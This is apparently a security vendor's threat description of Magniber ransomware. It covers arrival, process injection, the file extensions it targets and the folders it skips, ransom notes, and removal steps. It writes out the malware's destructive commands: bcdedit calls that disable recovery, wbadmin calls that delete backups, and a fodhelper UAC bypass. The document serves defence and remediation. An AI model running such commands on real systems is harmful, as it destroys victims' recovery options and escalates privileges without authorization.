Trojan.Win64.Injector (IKARUS)
Threat Type: Ransomware
Destructiveness: No
Encrypted: Yes
In the wild: Yes
Downloaded from the Internet, Dropped by other malware
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It gathers certain information on the affected computer.
It redirects browsers to certain sites. However, as of this writing, the said sites are inaccessible.
It encrypts files with specific file extensions. It drops files as ransom note.
21,938,176 bytes
12 Jul 2022
Connects to URLs/IPs, Collects system information, Encrypts files, Injects code
Arrival Details
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
This Ransomware drops and executes the following files:
- %Public%\{random characters}.arc → Encoded script that disables recovery boot and deletes system backups
(Note: %Public% is the folder that serves as a repository of files or folders common to all users, which is usually C:\Users\Public in Windows Vista, 7, and 8.)
It adds the following processes:
- %System%\cmd.exe /c fodhelper.exe → to bypass UAC
- "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/{random characters}.arc
- bcdedit /set {default} recoveryenabled no
- wbadmin delete catalog -quiet
- wbadmin delete systemstatebackup -quiet
- bcdedit /set {default} bootstatuspolicy ignoreallfailures
- Open payment payment page through Microsoft Edge browser:
- cmd /c "start microsoft-edge:http://{random characters}telmpeup.{BLOCKED}e.tech./telmpeup&{string1}&{string2}&{string3}&{string4}&{string5}
- where:
- {string1} - The number of drives in which the ransomware has enumerated files
- {string2} - Total size of encrypted data has generated in bytes
- {string3} - The number of files it encrypts
- {string4} - The number of file it enumerates
- {string5} - The build number of the compromised Windows OS
It adds the following mutexes to ensure that only one of its copies runs at any one time:
- \BasedNameObjects\ecxwpbkdzzxrrhlqC
It injects codes into the following process(es):
- It injects into each process if the following criteria is met:
- It is not running in a WOW64 environment.
- The process integrity level is less than SYSTEM.
- The UNICODE process name length is greater than 6.
Information Theft
This Ransomware gathers the following information on the affected computer:
- The number of drives in which the ransomware has enumerated files
- Total size of encrypted data has generated in bytes
- The number of files it encrypts
- The number of file it enumerates
- The build number of the compromised Windows OS
Other Details
This Ransomware redirects browsers to the following sites:
- http://{random characters}telmpeup.{BLOCKED}e.tech./telmpeup&{string1}&{string2}&{string3}&{string4}&{string5} → connects to payment page
It does the following:
- It encrypts the following volume types:
- It avoids encrypting volumes with the following characteristics:
- It avoids encrypting folders with the following attributes:
- It avoids encrypting files with the following attributes:
- It avoids encrypting files with no file extensions.
However, as of this writing, the said sites are inaccessible.
Ransomware Routine
This Ransomware encrypts files with the following extensions:
- .abm
- .abs
- .abw
- .accdb
- .act
- .adn
- .adp
- .aes
- .aft
- .afx
- .agif
- .agp
- .ahd
- .ai
- .aic
- .aim
- .albm
- .alf
- .ans
- .apd
- .apm
- .apng
- .aps
- .apt
- .apx
- .arc
- .art
- .arw
- .asc
- .ase
- .asf
- .ask
- .asm
- .asp
- .asw
- .asy
- .aty
- .avi
- .awdb
- .awp
- .awt
- .aww
- .azz
- .bad
- .bak
- .bay
- .bbs
- .bdb
- .bdp
- .bdr
- .bean
- .bib
- .bmp
- .bmx
- .bna
- .bnd
- .boc
- .bok
- .brd
- .brk
- .brn
- .brt
- .bss
- .btd
- .bti
- .btr
- .c
- .ca
- .cals
- .can
- .cd
- .cdb
- .cdc
- .cdg
- .cdmm
- .cdmt
- .cdmz
- .cdr
- .cdt
- .cf
- .cfu
- .cgm
- .cimg
- .cin
- .cit
- .ckp
- .class
- .clkw
- .cma
- .cmx
- .cnm
- .cnv
- .colz
- .cpc
- .cpd
- .cpg
- .cpp
- .cps
- .cpx
- .crd
- .crt
- .crw
- .cs
- .csr
- .csv
- .csy
- .ct
- .cvg
- .cvi
- .cvs
- .cvx
- .cwt
- .cxf
- .cyi
- .dad
- .daf
- .db
- .dbc
- .dbf
- .dbk
- .dbs
- .dbt
- .dbv
- .dbx
- .dca
- .dcb
- .dch
- .dcr
- .dcs
- .dct
- .dcx
- .dd
- .dds
- .ded
- .der
- .dgn
- .dgs
- .dgt
- .dhs
- .dib
- .dif
- .dip
- .diz
- .djv
- .djvu
- .dmi
- .dmo
- .dnc
- .dne
- .doc
- .docb
- .docm
- .docx
- .docz
- .dot
- .dotm
- .dotx
- .dpp
- .dpx
- .dqy
- .drw
- .drz
- .dsk
- .dsn
- .dsv
- .dt
- .dta
- .dtsx
- .dtw
- .dv
- .dvi
- .dwg
- .dx
- .dx
- .dxb
- .dxf
- .eco
- .ecw
- .ecx
- .edb
- .efd
- .egc
- .eio
- .eip
- .eit
- .em
- .emd
- .emf
- .emlx
- .ep
- .epf
- .epp
- .eps
- .epsf
- .eq
- .erf
- .err
- .etf
- .etx
- .euc
- .exr
- .fa
- .faq
- .fax
- .fb
- .fbx
- .fcd
- .fcf
- .fdf
- .fdr
- .fds
- .fdt
- .fdx
- .fdxt
- .fes
- .fft
- .fi
- .fic
- .fid
- .fif
- .fig
- .fla
- .flr
- .flv
- .fmv
- .fo
- .fodt
- .fpos
- .fpt
- .fpx
- .frm
- .frt
- .frx
- .ftn
- .fwdn
- .fxc
- .fxg
- .fzb
- .fzv
- .gcdp
- .gdb
- .gdoc
- .gem
- .geo
- .gfb
- .gfie
- .ggr
- .gif
- .gih
- .gim
- .gio
- .glox
- .gpd
- .gpg
- .gpn
- .gro
- .grob
- .grs
- .gsd
- .gthr
- .gtp
- .gv
- .gwi
- .gz
- .h
- .hbk
- .hdb
- .hdp
- .hdr
- .hht
- .his
- .hp
- .hpg
- .hpi
- .hs
- .htc
- .hwp
- .hz
- .ib
- .ibd
- .icn
- .icon
- .icpr
- .idc
- .idea
- .idx
- .igt
- .igx
- .ihx
- .ii
- .iiq
- .imd
- .info
- .ink
- .ipf
- .ipx
- .iso
- .itdb
- .itw
- .iwi
- .j
- .jar
- .jas
- .java
- .jbig
- .jbmp
- .jbr
- .jfif
- .jia
- .jis
- .jng
- .joe
- .jpe
- .jpeg
- .jpg
- .jps
- .jpx
- .jrtf
- .js
- .jsp
- .jtf
- .jtx
- .jw
- .jxr
- .kdb
- .kdbx
- .kdc
- .kdi
- .kdk
- .kes
- .key
- .kic
- .klg
- .knt
- .kon
- .kpg
- .kwd
- .lay
- .lbm
- .lbt
- .ldf
- .lgc
- .lis
- .lit
- .ljp
- .lmk
- .lnt
- .lrc
- .lst
- .ltr
- .ltx
- .lue
- .luf
- .lwo
- .lwp
- .lws
- .lyt
- .lyx
- .ma
- .mac
- .man
- .map
- .maq
- .mat
- .max
- .mb
- .mbm
- .mbox
- .mdb
- .mdf
- .mdn
- .mdt
- .me
- .mef
- .mel
- .mft
- .mgcb
- .mgmf
- .mgmt
- .mgmx
- .mgtx
- .mid
- .min
- .mkv
- .mm
- .mmat
- .mnr
- .mnt
- .mos
- .mov
- .mpeg
- .mpf
- .mpg
- .mpo
- .mrg
- .mrxs
- .msg
- .mud
- .mwb
- .mwp
- .mx
- .my
- .myd
- .myi
- .ncr
- .nct
- .ndf
- .nef
- .nfo
- .njx
- .nlm
- .now
- .nrw
- .nsf
- .nyf
- .nzb
- .obj
- .oce
- .oci
- .ocr
- .odb
- .odg
- .odm
- .odo
- .odp
- .ods
- .odt
- .of
- .oft
- .omf
- .oplc
- .oqy
- .ora
- .orf
- .ort
- .orx
- .ost
- .ota
- .otg
- .oti
- .otp
- .ots
- .ott
- .ovp
- .ovr
- .owc
- .owg
- .oyx
- .ozb
- .ozj
- .ozt
- .p
- .pa
- .pan
- .pano
- .pap
- .paq
- .pas
- .pbm
- .pcd
- .pcs
- .pdb
- .pdd
- .pdm
- .pds
- .pdt
- .pef
- .pem
- .pff
- .pfi
- .pfs
- .pfv
- .pfx
- .pgf
- .pgm
- .phm
- .php
- .pic
- .pict
- .pix
- .pjpg
- .pjt
- .plt
- .pm
- .pmg
- .png
- .pni
- .pnm
- .pntg
- .pnz
- .pobj
- .pop
- .pot
- .potm
- .potx
- .ppam
- .ppm
- .pps
- .ppsm
- .ppsx
- .ppt
- .pptm
- .pptx
- .prt
- .prw
- .psd
- .psdx
- .pse
- .psid
- .psp
- .pst
- .psw
- .ptg
- .pth
- .ptx
- .pu
- .pvj
- .pvm
- .pvr
- .pwa
- .pwi
- .pwr
- .px
- .pxr
- .pza
- .pzp
- .pzs
- .qd
- .qmg
- .qpx
- .qry
- .qvd
- .rad
- .rar
- .ras
- .raw
- .rb
- .rctd
- .rcu
- .rd
- .rdb
- .rft
- .rgb
- .rgf
- .rib
- .ric
- .riff
- .ris
- .rix
- .rle
- .rli
- .rng
- .rpd
- .rpf
- .rpt
- .rri
- .rs
- .rsb
- .rsd
- .rsr
- .rst
- .rt
- .rtd
- .rtf
- .rtx
- .run
- .rw
- .rzk
- .rzn
- .saf
- .sam
- .sbf
- .scad
- .scc
- .sch
- .sci
- .scm
- .sct
- .scv
- .scw
- .sdb
- .sdf
- .sdm
- .sdoc
- .sdw
- .sep
- .sfc
- .sfw
- .sgm
- .sh
- .sig
- .skm
- .sla
- .sld
- .sldm
- .sldx
- .slk
- .sln
- .sls
- .smf
- .sms
- .snt
- .sob
- .spa
- .spe
- .sph
- .spj
- .spp
- .spq
- .spr
- .sq
- .sqb
- .srw
- .ssa
- .ssk
- .st
- .stc
- .std
- .sti
- .stm
- .stn
- .stp
- .str
- .stw
- .sty
- .sub
- .suo
- .svf
- .svg
- .svgz
- .swf
- .sxc
- .sxd
- .sxg
- .sxi
- .sxm
- .sxw
- .tab
- .tar
- .tbk
- .tcx
- .tdf
- .tdt
- .te
- .tex
- .text
- .tgz
- .thp
- .tif
- .tiff
- .tlb
- .tlc
- .tm
- .tmd
- .tmv
- .tmx
- .tne
- .tpc
- .trm
- .tvj
- .udb
- .ufr
- .unx
- .uof
- .uop
- .uot
- .upd
- .usr
- .utxt
- .vb
- .vbr
- .vbs
- .vcd
- .vct
- .vdb
- .vdi
- .vec
- .vm
- .vmdk
- .vmx
- .vnt
- .vob
- .vpd
- .vrm
- .vrp
- .vsd
- .vsdm
- .vsdx
- .vsm
- .vstm
- .vstx
- .vue
- .vw
- .wav
- .wbk
- .wcf
- .wdb
- .wgz
- .wire
- .wks
- .wma
- .wmdb
- .wmv
- .wn
- .wp
- .wp
- .wpa
- .wpd
- .wpg
- .wps
- .wpt
- .wpw
- .wri
- .wsc
- .wsd
- .wsh
- .wtx
- .x
- .xar
- .xd
- .xdb
- .xlc
- .xld
- .xlf
- .xlgc
- .xlm
- .xls
- .xlsb
- .xlsm
- .xlsx
- .xlt
- .xltm
- .xltx
- .xlw
- .xps
- .xwp
- .xyp
- .xyw
- .ya
- .ybk
- .ym
- .zabw
- .zdb
- .zdc
- .zip
- .zw
It avoids encrypting files found in the following folders:
- documents and settings
- appdata
- local settings
- sample music
- sample pictures
- sample videos
- tor browser
- recycle
- windows
- boot
- intel
- msocache
- perflogs
- program files
- programdata
- recovery
- system volume information
- winnt
It appends the following extension to the file name of the encrypted files:
- {Original file name}.{Original file extension}.telmpeup
It drops the following file(s) as ransom note:
- {Encrypted directory}\README.html
- %Public%\README.html
12 Sep 2022
13 Sep 2022
Step 1
Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Search and delete this file
- {Encrypted directory}\README.html
- %Public%\README.html
- %Public%\{random characters}.arc
Step 4
Scan your computer with your Trend Micro product to delete files detected as Ransom.Win64.MAGNIBER.YPCGK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Step 5
Restore encrypted files from backup.
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